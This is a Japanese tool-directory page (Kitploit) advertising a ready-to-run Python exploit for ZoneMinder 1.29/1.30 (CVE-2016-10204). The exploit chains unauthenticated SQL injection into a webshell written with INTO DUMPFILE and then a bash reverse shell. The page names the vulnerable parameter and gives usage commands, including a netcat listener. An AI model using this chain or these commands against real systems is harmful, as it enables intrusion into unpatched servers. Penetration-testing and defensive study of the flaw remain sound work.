Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
zoneminder-1.29-1.30-rce-exploit — ZoneMinder 1.29/1.30 における未認証 SQL インジェクションから RCE へのエクスプロイト(CVE-2016-10204、EDB-41239)。単一コマンドの SQLi から webshell、そしてリバースシェルまでの PoC を Python で実装。 | Kitploit
ツール/GitHubGitHub/akash0x00/zoneminder-1.29-1.30-rce-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテストコマンド&コントロールペイロード開発
GitHubakash0x00/zoneminder-1.29-1.30-rce-exploit

zoneminder-1.29-1.30-rce-exploit

ZoneMinder 1.29/1.30 における未認証 SQL インジェクションから RCE へのエクスプロイト(CVE-2016-10204、EDB-41239)。単一コマンドの SQLi から webshell、そしてリバースシェルまでの PoC を Python で実装。

リポジトリを見る
18時間3分前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

ZoneMinder 1.29/1.30 SQLiからRCEへのエクスプロイト

ZoneMinder 1.29/1.30 向けのすぐに実行できる Python エクスプロイトで、認証不要の SQL インジェクション(CVE-2016-10204、EDB-41239)を連鎖させて、対話型リバースシェルまで到達します。

これは既知の修正済み CVE に対する weaponized/自動化された PoC であり、新しいエクスプロイトではありません。

このバグに対する EDB の PoC は SQLi ペイロードで止まるか、「sqlmap を向ける」だけです。このエクスプロイトは完全な SQLi から webshell、そして shell への連鎖を 1 つの読みやすいスクリプトにまとめています。

動作内容

  1. index.php?view=request&request=log&task=query の limit POST パラメータに対して、時間ベース(SLEEP)のプローブでインジェクションを確認します。
  2. SELECT ... INTO DUMPFILE を介して、Web ルートに小さな PHP webshell を書き込み、いくつかの一般的な ZoneMinder/Apache パスを試します。
  3. 稼働中の webshell をプローブし、その後 bash リバースシェルをあなたの netcat リスナーに発火させます。

対処している 2 つの落とし穴

  • OUTFILE ではなく DUMPFILE。 OUTFILE は改行をエスケープし、複数行の PHP を壊します。DUMPFILE は生のバイトを書き込むため、webshell は有効なままです。
  • 実行ごとに新しいランダムなファイル名。 MySQL は既存のファイルの上書きを拒否するため、固定名は前回の実行で残った古いドロップと衝突します。

使用方法

root@kitploit:~
# シェルを取得
python3 zm-exploit.py -u http://TARGET/zm/ -l YOUR_IP -p 443

# プロンプトが表示されたら、別のターミナルでリスナーを起動
sudo nc -lvnp 443

# その後、ドロップされた webshell を削除(名前は最後に表示されます)
python3 zm-exploit.py -u http://TARGET/zm/ --cleanup a1b2c3d4.php

クレジット

  • FOXMOLE(CVE-2016-10204 のアドバイザリの基盤)。
  • 元の PoC: Exploit-DB 41239。

ライセンス

MIT、LICENSE を参照。

ツールをダウンロード